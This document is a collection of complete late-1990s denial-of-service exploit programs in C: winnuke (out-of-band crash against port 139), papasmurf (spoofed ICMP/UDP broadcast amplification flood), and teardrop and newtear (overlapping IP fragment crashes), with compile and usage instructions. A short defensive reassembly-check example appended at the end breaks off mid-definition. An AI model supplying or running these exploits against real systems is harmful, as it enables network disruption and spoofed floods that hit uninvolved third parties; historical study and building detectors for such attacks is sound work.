 ----- winnuke.c ----- cut ----- cut -----

 /* winnuke.c - (05/07/97)  By _eci  */
 /* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */


 #include <stdio.h>
 #include <string.h>
 #include <netdb.h>
 #include <netinet/in.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <unistd.h>

 #define dport 139  /* Attack port: 139 is what we want */

 int x, s;
 char *str = "Bye";  /* Makes no diff */
 struct sockaddr_in addr, spoofedaddr;
 struct hostent *host;


 int open_sock(int sock, char *server, int port) {
      struct sockaddr_in blah;
      struct hostent *he;
      bzero((char *)&blah,sizeof(blah));
      blah.sin_family=AF_INET;
      blah.sin_addr.s_addr=inet_addr(server);
      blah.sin_port=htons(port);


     if ((he = gethostbyname(server)) != NULL) {
         bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
     }
     else {
          if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
            perror("gethostbyname()");
            return(-3);
          }
     }

         if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
              perror("connect()");
              close(sock);
              return(-4);
         }
         printf("Connected to [%s:%d].\n",server,port);
         return;
 }


 void main(int argc, char *argv[]) {

      if (argc != 2) {
        printf("Usage: %s <target>\n",argv[0]);
        exit(0);
      }

      if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
         perror("socket()");
         exit(-1);
      }

      open_sock(s,argv[1],dport);


      printf("Sending crash... ");
        send(s,str,strlen(str),MSG_OOB);
        usleep(100000);
      printf("Done!\n");
      close(s);
 }

 ----- cut ----- cut -----

 ----- papasmurf.c ----- cut ----- cut -----


 /*
  *  (papa)smurf.c v5.0 by TFreak - http://www.rootshell.com
  *
  *  A year ago today I made what remains the questionable decision of
  *  releasing my program 'smurf', a program which uses broadcast "amplifiers"
  *  to turn an icmp flood into an icmp holocaust, into the hands of packet
  *  monkeys, script kiddies and all round clueless idiots alike.  Nine months
  *  following, a second program 'fraggle', smurf's udp cousin, was introduced
  *  into their Denial of Service orgy.  This brings us to today, July 28,
  *  1998, one year after my first "mistake".  The result, proof that history
  *  does repeat itself and a hybrid of the original programs.
  *
  *  First may I say that I in no way take credit for "discovering" this.
  *  There is no doubt in my mind that this idea was envisioned long before
  *  I was even sperm -- I merely decided to do something about it.  Secondly,
  *  if you want to hold me personally responsible for turning the internet
  *  into a larger cesspool of crap than it already is, then may I take this
  *  opportunity to deliver to you a message of the utmost importance -- "Fuck
  *  you".  If I didn't write it, someone else would have.
  *
  *  I must admit that there really is no security value for me releasing this
  *  new version.  In fact, my goals for the version are quite silly. First,
  *  I didn't like the way my old code looked, it was ugly to look at and it
  *  did some stupid unoptimized things.  Second, it's smurfs one year
  *  birthday -- Since I highly doubt anyone would have bought it a cake, I
  *  thought I would do something "special" to commemorate the day.
  *
  *  Hmm, I am starting to see why I am known for my headers (wage eats
  *  playdough!).
  *
  *  Well, I guess this wouldn't be the same if I did not include some sort
  *  of shoutouts, so here goes...
  *
  *  A hearty handshake to...
  *
  *    o  MSofty, pbug, Kain -- No matter which path each of you decides to
  *       take in the future, I will always look back upon these days as one
  *       of the most enjoyable, memorable and thought-provoking experiences
  *       of my life.  I have nothing but the highest degree of respect for
  *       each of you, and I value your friendship immensely.  Here's to
  *       living, learning and laughing -- Cheers gentlemen. --Dan
  *    o  Hi JoJo!
  *    o  morbid and his grandam barbiegirl gino styles, yo.
  *    o  The old #havok crew.
  *    o  Pharos,silph,chris@unix.org,Viola,Vonne,Dianora,fyber,silitek,
  *       brightmn,Craig Huegen,Dakal,Col_Rebel,Rick the Temp,jenni`,Paige,
  *       RedFemme,nici,everlast,and everyone else I know and love.
  *
  *  A hearty enema using 15.0mol/L HCl to...
  *
  *    o  #Conflict.  Perhaps you are just my scapegoat of aggression, but you
  *       all really need to stop flooding efnet servers/taking over irc
  *       channels/mass owning networks running old qpoppers and get a
  *       fucking life.
  *    o  BR.  It wouldn't be the same without you in here, but to be honest
  *       you really aren't worth the space in the already way-to-bloated
  *       header, nor the creative energy of me coming up with an intricate
  *       bash that you will never understand anyway.  Shrug, hatred disguises
  *       itself as apathy with time.
  *
  *  I feel like I'm writing a fucking essay here...
  *
  *  To compile: "gcc -DLINUX -o smurf5 papasmurf.c" if your LINUXish.
  *                                 or just
  *              "gcc -o smurf5 papasmurf.c" if your BSDish.
  *
  *  Old linux kernels won't have BSD header support, so this may not compile.
  *  If you wish a linux-only version, do it yourself, or mail
  *  tfreak@jaded.net, and I might lend you mine.
  *
  *  And most importantly, please don't abuse this.  If you are going to do
  *  anything with this code, learn from it.
  *
  *  I remain,
  *
  *  TFreak.
  *
  */

 /* End of Hideously Long Header */

 #include <stdio.h>
 #include <netdb.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <netinet/in.h>
 #include <netinet/in_systm.h>
 #include <arpa/inet.h>
 #include <sys/stat.h>
 #include <fcntl.h>
 #include <unistd.h>
 #include <stdlib.h>
 #include <string.h>
 #include <ctype.h>
 #include <time.h>
 #ifdef LINUX
 #define __FAVOR_BSD                             /* should be __FAVOUR_BSD ;) */
 #ifndef _USE_BSD
 #define _USE_BSD
 #endif
 #endif
 #include <netinet/ip.h>
 #include <netinet/ip_icmp.h>
 #include <netinet/udp.h>

 #ifdef LINUX
 #define FIX(n)  htons(n)
 #else
 #define FIX(n)  (n)
 #endif

 struct smurf_t
 {
     struct sockaddr_in sin;                     /* socket prot structure */
     int s;                                      /* socket */
     int udp, icmp;                              /* icmp, udp booleans */
     int rnd;                                    /* Random dst port boolean */
     int psize;                                  /* packet size */
     int num;                                    /* number of packets to send */
     int delay;                                  /* delay between (in ms) */
     u_short dstport[25+1];                      /* dest port array (udp) */
     u_short srcport;                            /* source port (udp) */
     char *padding;                              /* junk data */
 };

 /* function prototypes */
 void usage (char *);
 u_long resolve (char *);
 void getports (struct smurf_t *, char *);
 void smurficmp (struct smurf_t *, u_long);
 void smurfudp (struct smurf_t *, u_long, int);
 u_short in_chksum (u_short *, int);


 int
 main (int argc, char *argv[])
 {
     struct smurf_t sm;
     struct stat st;
     u_long bcast[1024];
     char buf[32];
     int c, fd, n, cycle, num = 0, on = 1;
     FILE *bcastfile;

     /* shameless self promotion banner */
     fprintf(stderr, "\n(papa)smurf.c v5.0 by TFreak\n\n");

     if (argc < 3)
         usage(argv[0]);

     /* set defaults */
     memset((struct smurf_t *) &sm, 0, sizeof(sm));
     sm.icmp = 1;
     sm.psize = 64;
     sm.num = 0;
     sm.delay = 10000;
     sm.sin.sin_port = htons(0);
     sm.sin.sin_family = AF_INET;
     sm.srcport = 0;
     sm.dstport[0] = 7;

     /* resolve 'source' host, quit on error */
     sm.sin.sin_addr.s_addr = resolve(argv[1]);

     /* open the broadcast file */
     if ((bcastfile = fopen(argv[2], "r")) == NULL)
     {
         perror("Opening broadcast file");
         exit(-1);
     }

     /* parse out options */
     optind = 3;
     while ((c = getopt(argc, argv, "rRn:d:p:P:s:S:f:")) != -1)
     {
         switch (c)
         {
             /* random dest ports */
             case 'r':
                 sm.rnd = 1;
                 break;

             /* random src/dest ports */
             case 'R':
                 sm.rnd = 1;
                 sm.srcport = 0;
                 break;

             /* number of packets to send */
             case 'n':
                 sm.num = atoi(optarg);
                 break;

             /* usleep between packets (in ms) */
             case 'd':
                 sm.delay = atoi(optarg);
                 break;

             /* multiple ports */
             case 'p':
                 if (strchr(optarg, ','))
                     getports(&sm, optarg);
                 else
                     sm.dstport[0] = (u_short) atoi(optarg);
                 break;

             /* specify protocol */
             case 'P':
                 if (strcmp(optarg, "icmp") == 0)
                 {
                     /* this is redundant */
                     sm.icmp = 1;
                     break;
                 }
                 if (strcmp(optarg, "udp") == 0)
                 {
                     sm.icmp = 0;
                     sm.udp = 1;
                     break;
                 }
                 if (strcmp(optarg, "both") == 0)
                 {
                     sm.icmp = 1;
                     sm.udp = 1;
                     break;
                 }

                 puts("Error: Protocol must be icmp, udp or both");
                 exit(-1);

             /* source port */
             case 's':
                 sm.srcport = (u_short) atoi(optarg);
                 break;

             /* specify packet size */
             case 'S':
                 sm.psize = atoi(optarg);
                 break;

             /* filename to read padding in from */
             case 'f':
                 /* open and stat */
                 if ((fd = open(optarg, O_RDONLY)) == -1)
                 {
                     perror("Opening packet data file");
                     exit(-1);
                 }
                 if (fstat(fd, &st) == -1)
                 {
                     perror("fstat()");
                     exit(-1);
                 }

                 /* malloc and read */
                 sm.padding = (char *) malloc(st.st_size);
                 if (read(fd, sm.padding, st.st_size) < st.st_size)
                 {
                     perror("read()");
                     exit(-1);
                 }

                 sm.psize = st.st_size;
                 close(fd);
                 break;

             default:
                 usage(argv[0]);
         }
     } /* end getopt() loop */

     /* create packet padding if neccessary */
     if (!sm.padding)
     {
         sm.padding = (char *) malloc(sm.psize);
         memset(sm.padding, 0, sm.psize);
     }

     /* create the raw socket */
     if ((sm.s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
     {
         perror("Creating raw socket (are you root?)");
         exit(-1);
     }

     /* Include IP headers ourself (thanks anyway though) */
     if (setsockopt(sm.s, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
     {
         perror("setsockopt()");
         exit(-1);
     }

     /* read in our broadcasts and store them in our array */
     while (fgets(buf, sizeof buf, bcastfile) != NULL)
     {
         char *p;
         int valid;

         /* skip over comments/blank lines */
         if (buf[0] == '#' || buf[0] == '\n') continue;

         /* get rid of newline */
         buf[strlen(buf) - 1] = '\0';

         /* check for valid address */
         for (p = buf, valid = 1; *p != '\0'; p++)
         {
             if ( ! isdigit(*p) && *p != '.' )
             {
                 fprintf(stderr, "Skipping invalid ip %s\n", buf);
                 valid = 0;
                 break;
             }
         }

         /* if valid address, copy to our array */
         if (valid)
         {
             bcast[num] = inet_addr(buf);
             num++;
             if (num == 1024)
                 break;
         }
     } /* end bcast while loop */

     /* seed our random function */
     srand(time(NULL) * getpid());

     /* wee.. */
     for (n = 0, cycle = 0; n < sm.num || !sm.num; n++)
     {
         if (sm.icmp)
             smurficmp(&sm, bcast[cycle]);

         if (sm.udp)
         {
             int x;
             for (x = 0; sm.dstport[x] != 0; x++)
                 smurfudp(&sm, bcast[cycle], x);
         }

         /* quick nap */
         usleep(sm.delay);

         /* cosmetic psychedelic dots */
         if (n % 50 == 0)
         {
             printf(".");
             fflush(stdout);
         }

         cycle = (cycle + 1) % num;
     }

     exit(0);
 }


 void
 usage (char *s)
 {
     fprintf(stderr,
             "usage: %s <source host> <broadcast file> [options]\n"
             "\n"
             "Options\n"
             "-p:        Comma separated list of dest ports (default 7)\n"
             "-r:        Use random dest ports\n"
             "-R:        Use random src/dest ports\n"
             "-s:        Source port (0 for random (default))\n"
             "-P:        Protocols to use.  Either icmp, udp or both\n"
             "-S:        Packet size in bytes (default 64)\n"
             "-f:        Filename containing packet data (not needed)\n"
             "-n:        Num of packets to send (0 is continuous (default))\n"
             "-d:        Delay in between packets (in ms) (default 10000)\n"
             "\n", s);
     exit(-1);
 }


 u_long
 resolve (char *host)
 {
     struct in_addr in;
     struct hostent *he;

     /* try ip first */
     if ((in.s_addr = inet_addr(host)) == -1)
     {
         /* nope, try it as a fqdn */
         if ((he = gethostbyname(host)) == NULL)
         {
             /* can't resolve, bye. */
             herror("Resolving victim host");
             exit(-1);
         }

         memcpy( (caddr_t) &in, he->h_addr, he->h_length);
     }

     return(in.s_addr);
 }


 void
 getports (struct smurf_t *sm, char *p)
 {
     char tmpbuf[16];
     int n, i;

     for (n = 0, i = 0; (n < 25) && (*p != '\0'); p++, i++)
     {
         if (*p == ',')
         {
             tmpbuf[i] = '\0';
             sm->dstport[n] = (u_short) atoi(tmpbuf);
             n++; i = -1;
             continue;
         }

         tmpbuf[i] = *p;
     }
     tmpbuf[i] = '\0';
     sm->dstport[n] = (u_short) atoi(tmpbuf);
     sm->dstport[n + 1] = 0;
 }


 void
 smurficmp (struct smurf_t *sm, u_long dst)
 {
     struct ip *ip;
     struct icmp *icmp;
     char *packet;

     int pktsize = sizeof(struct ip) + sizeof(struct icmp) + sm->psize;

     packet = malloc(pktsize);
     ip = (struct ip *) packet;
     icmp = (struct icmp *) (packet + sizeof(struct ip));

     memset(packet, 0, pktsize);

     /* fill in IP header */
     ip->ip_v = 4;
     ip->ip_hl = 5;
     ip->ip_tos = 0;
     ip->ip_len = FIX(pktsize);
     ip->ip_ttl = 255;
     ip->ip_off = 0;
     ip->ip_id = FIX( getpid() );
     ip->ip_p = IPPROTO_ICMP;
     ip->ip_sum = 0;
     ip->ip_src.s_addr = sm->sin.sin_addr.s_addr;
     ip->ip_dst.s_addr = dst;

     /* fill in ICMP header */
     icmp->icmp_type = ICMP_ECHO;
     icmp->icmp_code = 0;
     icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));        /* thx griffin */

     /* send it on its way */
     if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
         sizeof(struct sockaddr)) == -1)
     {
         perror("sendto()");
         exit(-1);
     }

     free(packet);                                       /* free willy! */
 }


 void
 smurfudp (struct smurf_t *sm, u_long dst, int n)
 {
     struct ip *ip;
     struct udphdr *udp;
     char *packet, *data;

     int pktsize = sizeof(struct ip) + sizeof(struct udphdr) + sm->psize;

     packet = (char *) malloc(pktsize);
     ip = (struct ip *) packet;
     udp = (struct udphdr *) (packet + sizeof(struct ip));
     data = (char *) (packet + sizeof(struct ip) + sizeof(struct udphdr));

     memset(packet, 0, pktsize);
     if (*sm->padding)
         memcpy((char *)data, sm->padding, sm->psize);

     /* fill in IP header */
     ip->ip_v = 4;
     ip->ip_hl = 5;
     ip->ip_tos = 0;
     ip->ip_len = FIX(pktsize);
     ip->ip_ttl = 255;
     ip->ip_off = 0;
     ip->ip_id = FIX( getpid() );
     ip->ip_p = IPPROTO_UDP;
     ip->ip_sum = 0;
     ip->ip_src.s_addr = sm->sin.sin_addr.s_addr;
     ip->ip_dst.s_addr = dst;

     /* fill in UDP header */
     if (sm->srcport) udp->uh_sport = htons(sm->srcport);
     else udp->uh_sport = htons(rand());
     if (sm->rnd) udp->uh_dport = htons(rand());
     else udp->uh_dport = htons(sm->dstport[n]);
     udp->uh_ulen = htons(sizeof(struct udphdr) + sm->psize);
 //    udp->uh_sum = in_chksum((u_short *)udp, sizeof(udp));

     /* send it on its way */
     if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
         sizeof(struct sockaddr)) == -1)
     {
         perror("sendto()");
         exit(-1);
     }

     free(packet);                               /* free willy! */
 }


 u_short
 in_chksum (u_short *addr, int len)
 {
     register int nleft = len;
     register u_short *w = addr;
     register int sum = 0;
     u_short answer = 0;

     while (nleft > 1)
     {
         sum += *w++;
         nleft -= 2;
     }

     if (nleft == 1)
     {
         *(u_char *)(&answer) = *(u_char *)w;
         sum += answer;
     }

     sum = (sum >> 16) + (sum & 0xffff);   /* fold the carries into the low 16 bits */
     sum += (sum >> 16);
     answer = ~sum;
     return(answer);
 }

 /* EOF */

 ----- cut ----- cut -----

 ----- teardrop.c ----- cut ----- cut -----

 /*
  *  Copyright (c) 1997 route|daemon9  <route@infonexus.com> 11.3.97
  *
  *  Linux/NT/95 Overlap frag bug exploit
  *
  *  Exploits the overlapping IP fragment bug present in all Linux kernels and
  *  NT 4.0 / Windows 95 (others?)
  *
  *  Based off of:   flip.c by klepto
  *  Compiles on:    Linux, *BSD*
  *
  *  gcc -O2 teardrop.c -o teardrop
  *      OR
  *  gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
  */

 #include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <string.h>
 #include <netdb.h>
 #include <netinet/in.h>
 #include <netinet/udp.h>
 #include <arpa/inet.h>
 #include <sys/types.h>
 #include <sys/time.h>
 #include <sys/socket.h>

 #ifdef STRANGE_BSD_BYTE_ORDERING_THING
                         /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
 #define FIX(n)  (n)
 #else                   /* OpenBSD 2.1, all Linux */
 #define FIX(n)  htons(n)
 #endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

 #define IP_MF   0x2000  /* More IP fragment en route */
 #define IPH     0x14    /* IP header size */
 #define UDPH    0x8     /* UDP header size */
 #define PADDING 0x1c    /* datagram frame padding for first packet */
 #define MAGIC   0x3     /* Magic Fragment Constant (tm).  Should be 2 or 3 */
 #define COUNT   0x1     /* Linux dies with 1, NT is more stalwart and can
                          * withstand maybe 5 or 10 sometimes...  Experiment.
                          */
 void usage(u_char *);
 u_long name_resolve(u_char *);
 u_short in_cksum(u_short *, int);
 void send_frags(int, u_long, u_long, u_short, u_short);

 int main(int argc, char **argv)
 {
     int one = 1, count = 0, i, rip_sock;
     u_long  src_ip = 0, dst_ip = 0;
     u_short src_prt = 0, dst_prt = 0;
     struct in_addr addr;

     fprintf(stderr, "teardrop   route|daemon9\n\n");

     if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
     {
         perror("raw socket");
         exit(1);
     }
     if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
         < 0)
     {
         perror("IP_HDRINCL");
         exit(1);
     }
     if (argc < 3) usage(argv[0]);
     if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
     {
         fprintf(stderr, "What the hell kind of IP address is that?\n");
         exit(1);
     }

     while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
     {
         switch (i)
         {
             case 's':               /* source port (should be ephemeral) */
                 src_prt = (u_short)atoi(optarg);
                 break;
             case 't':               /* dest port (DNS, anyone?) */
                 dst_prt = (u_short)atoi(optarg);
                 break;
             case 'n':               /* number to send */
                 count   = atoi(optarg);
                 break;
             default :
                 usage(argv[0]);
                 break;              /* NOTREACHED */
         }
     }
     srandom((unsigned)(time((time_t)0)));
     if (!src_prt) src_prt = (random() % 0xffff);
     if (!dst_prt) dst_prt = (random() % 0xffff);
     if (!count)   count   = COUNT;

     fprintf(stderr, "Death on flaxen wings:\n");
     addr.s_addr = src_ip;
     fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
     addr.s_addr = dst_ip;
     fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
     fprintf(stderr, " Amt: %5d\n", count);
     fprintf(stderr, "[ ");

     for (i = 0; i < count; i++)
     {
         send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
         fprintf(stderr, "b00m ");
         usleep(500);
     }
     fprintf(stderr, "]\n");
     return (0);
 }

 /*
  *  Send two IP fragments with pathological offsets.  We use an implementation
  *  independent way of assembling network packets that does not rely on any of
  *  the diverse O/S specific nomenclature hindrances (well, linux vs. BSD).
  */

 void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                 u_short dst_prt)
 {
     u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
     u_char byte;                            /* a byte */
     struct sockaddr_in sin;                 /* socket protocol structure */

     sin.sin_family      = AF_INET;
     sin.sin_port        = src_prt;
     sin.sin_addr.s_addr = dst_ip;

     /*
      * Grab some memory for our packet, align p_ptr to point at the beginning
      * of our packet, and then fill it with zeros.
      */
     packet = (u_char *)malloc(IPH + UDPH + PADDING);
     p_ptr  = packet;
     bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

     byte = 0x45;                        /* IP version and header length */
     memcpy(p_ptr, &byte, sizeof(u_char));
     p_ptr += 2;                         /* IP TOS (skipped) */
     *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);    /* total length */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(242);   /* IP id */
     p_ptr += 2;
     *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
     p_ptr += 2;
     *((u_short *)p_ptr) = 0x40;         /* IP TTL */
     byte = IPPROTO_UDP;
     memcpy(p_ptr + 1, &byte, sizeof(u_char));
     p_ptr += 4;                         /* IP checksum filled in by kernel */
     *((u_long *)p_ptr) = src_ip;        /* IP source address */
     p_ptr += 4;
     *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
     p_ptr += 4;
     *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(8 + PADDING);   /* UDP total length */

     if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
                 sizeof(struct sockaddr)) == -1)
     {
         perror("\nsendto");
         free(packet);
         exit(1);
     }

     /*  We set the fragment offset to be inside of the previous packet's
      *  payload (it overlaps inside the previous packet) but do not include
      *  enough payload to complete the datagram.  Just the header will
      *  do, but to crash NT/95 machines, a bit larger of packet seems to work
      *  better.
      */
     p_ptr = &packet[2];         /* IP total length is 2 bytes into the header */
     *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
     p_ptr += 4;                 /* IP offset is 6 bytes into the header */
     *((u_short *)p_ptr) = FIX(MAGIC);

     if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
                 sizeof(struct sockaddr)) == -1)
     {
         perror("\nsendto");
         free(packet);
         exit(1);
     }
     free(packet);
 }

 u_long name_resolve(u_char *host_name)
 {
     struct in_addr addr;
     struct hostent *host_ent;

     if ((addr.s_addr = inet_addr(host_name)) == -1)
     {
         if (!(host_ent = gethostbyname(host_name))) return (0);
         bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
     }
     return (addr.s_addr);
 }

 void usage(u_char *name)
 {
     fprintf(stderr,
             "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
             name);
     exit(0);
 }

 ----- cut ----- cut -----

 ----- newtear.c ----- cut ----- cut -----

 /*  Newtear.c
  *  Seemingly, a new teardrop type exploit. Affects NT4, and Win95.
  *
  *  Discovered 01/08/1998
  *
  *  Updated notes:
  *     This is a new version of teardrop.  It affects NT 4 and Win95 machines with all
  *     current patches and hotfixes.  Causes a bluescreen in both operating systems.
  *     Linux appears unaffected, other *NIXes untested.  Differences are:
  *
  *     Smaller padding data size (20 bytes instead of 28 in previous teardrop)
  *     Faked out UDP total length.  (Increased reported UDP length to twice what it really is)
  *
  *  Copyright (c) 1997 route|daemon9  <route@infonexus.com> 11.3.97
  *
  *  Linux/NT/95 Overlap frag bug exploit
  *
  *  Exploits the overlapping IP fragment bug present in all Linux kernels and
  *  NT 4.0 / Windows 95 (others?)
  *
  *  Based off of:   flip.c by klepto
  *  Compiles on:    Linux, *BSD*
  *
  *  gcc -O2 teardrop.c -o teardrop
  *      OR
  *  gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
  */

 #include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <string.h>
 #include <netdb.h>
 #include <netinet/in.h>
 #include <netinet/udp.h>
 #include <arpa/inet.h>
 #include <sys/types.h>
 #include <sys/time.h>
 #include <sys/socket.h>

 #ifdef STRANGE_BSD_BYTE_ORDERING_THING
                         /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
 #define FIX(n)  (n)
 #else                   /* OpenBSD 2.1, all Linux */
 #define FIX(n)  htons(n)
 #endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

 #define IP_MF   0x2000  /* More IP fragment en route */
 #define IPH     0x14    /* IP header size */
 #define UDPH    0x8     /* UDP header size */
 #define PADDING 0x14    /* datagram frame padding for first packet */ /* JD Change pad size to 20 decimal. */
 #define MAGIC   0x3     /* Magic Fragment Constant (tm).  Should be 2 or 3 */
 #define COUNT   0x1     /* Linux dies with 1, NT is more stalwart and can
                          * withstand maybe 5 or 10 sometimes...  Experiment.
                          */
 void usage(u_char *);
 u_long name_resolve(u_char *);
 u_short in_cksum(u_short *, int);
 void send_frags(int, u_long, u_long, u_short, u_short);

 int main(int argc, char **argv)
 {
     int one = 1, count = 0, i, rip_sock;
     u_long  src_ip = 0, dst_ip = 0;
     u_short src_prt = 0, dst_prt = 0;
     struct in_addr addr;

     fprintf(stderr, "teardrop   route|daemon9\n\n");

     if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
     {
         perror("raw socket");
         exit(1);
     }
     if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
         < 0)
     {
         perror("IP_HDRINCL");
         exit(1);
     }
     if (argc < 3) usage(argv[0]);
     if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
     {
         fprintf(stderr, "What the hell kind of IP address is that?\n");
         exit(1);
     }

     while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
     {
         switch (i)
         {
             case 's':               /* source port (should be ephemeral) */
                 src_prt = (u_short)atoi(optarg);
                 break;
             case 't':               /* dest port (DNS, anyone?) */
                 dst_prt = (u_short)atoi(optarg);
                 break;
             case 'n':               /* number to send */
                 count   = atoi(optarg);
                 break;
             default :
                 usage(argv[0]);
                 break;              /* NOTREACHED */
         }
     }
     srandom((unsigned)(time((time_t)0)));
     if (!src_prt) src_prt = (random() % 0xffff);
     if (!dst_prt) dst_prt = (random() % 0xffff);
     if (!count)   count   = COUNT;

     fprintf(stderr, "Death on flaxen wings:\n");
     addr.s_addr = src_ip;
     fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
     addr.s_addr = dst_ip;
     fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
     fprintf(stderr, " Amt: %5d\n", count);
     fprintf(stderr, "[ ");

     for (i = 0; i < count; i++)
     {
         send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
         fprintf(stderr, "b00m ");
         usleep(500);
     }
     fprintf(stderr, "]\n");
     return (0);
 }

 /*
  *  Send two IP fragments with pathological offsets.  We use an implementation
  *  independent way of assembling network packets that does not rely on any of
  *  the diverse O/S specific nomenclature hindrances (well, linux vs. BSD).
  */

 void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                 u_short dst_prt)
 {
     u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
     u_char byte;                            /* a byte */
     struct sockaddr_in sin;                 /* socket protocol structure */

     sin.sin_family      = AF_INET;
     sin.sin_port        = src_prt;
     sin.sin_addr.s_addr = dst_ip;

     /*
      * Grab some memory for our packet, align p_ptr to point at the beginning
      * of our packet, and then fill it with zeros.
      */
     packet = (u_char *)malloc(IPH + UDPH + PADDING);
     p_ptr  = packet;
     bzero((u_char *)p_ptr, IPH + UDPH + PADDING); // Set it all to zero

     byte = 0x45;                        /* IP version and header length */
     memcpy(p_ptr, &byte, sizeof(u_char));
     p_ptr += 2;                         /* IP TOS (skipped) */
     *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);    /* total length */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(242);   /* IP id */
     p_ptr += 2;
     *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
     p_ptr += 2;
     *((u_short *)p_ptr) = 0x40;         /* IP TTL */
     byte = IPPROTO_UDP;
     memcpy(p_ptr + 1, &byte, sizeof(u_char));
     p_ptr += 4;                         /* IP checksum filled in by kernel */
     *((u_long *)p_ptr) = src_ip;        /* IP source address */
     p_ptr += 4;
     *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
     p_ptr += 4;
     *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(8 + PADDING*2);   /* UDP total length */ /* Increases UDP total length to 48 bytes
                                                      Which is too big! */

     if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
                 sizeof(struct sockaddr)) == -1)
     {
         perror("\nsendto");
         free(packet);
         exit(1);
     }

     /*  We set the fragment offset to be inside of the previous packet's
      *  payload (it overlaps inside the previous packet) but do not include
      *  enough payload to complete the datagram.  Just the header will
      *  do, but to crash NT/95 machines, a bit larger of packet seems to work
      *  better.
      */
     p_ptr = &packet[2];         /* IP total length is 2 bytes into the header */
     *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
     p_ptr += 4;                 /* IP offset is 6 bytes into the header */
     *((u_short *)p_ptr) = FIX(MAGIC);

     if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
                 sizeof(struct sockaddr)) == -1)
     {
         perror("\nsendto");
         free(packet);
         exit(1);
     }
     free(packet);
 }

 u_long name_resolve(u_char *host_name)
 {
     struct in_addr addr;
     struct hostent *host_ent;

     if ((addr.s_addr = inet_addr(host_name)) == -1)
     {
         if (!(host_ent = gethostbyname(host_name))) return (0);
         bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
     }
     return (addr.s_addr);
 }

 void usage(u_char *name)
 {
     fprintf(stderr,
             "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
             name);
     exit(0);
 }

 ----- cut ----- cut -----
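
The receiving side of the two listings above, as an added example that is not part of the original file: a sanity check a reassembly queue or sensor can run on a fragment and the one queued before it. All names are hypothetical and the sample headers are constructed from the constants in teardrop.c and newtear.c (wire byte order, addresses from 192.0.2.0/24).

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define F_OVERLAP 0x1   /* fragment starts inside the previous fragment's data */
#define F_NO_DATA 0x2   /* zero or fewer bytes left once the overlap is trimmed */
#define F_UDP_LEN 0x4   /* UDP length field is larger than the whole datagram */

struct frag {
    uint16_t id;        /* IP identification */
    uint32_t start;     /* first payload byte within the datagram */
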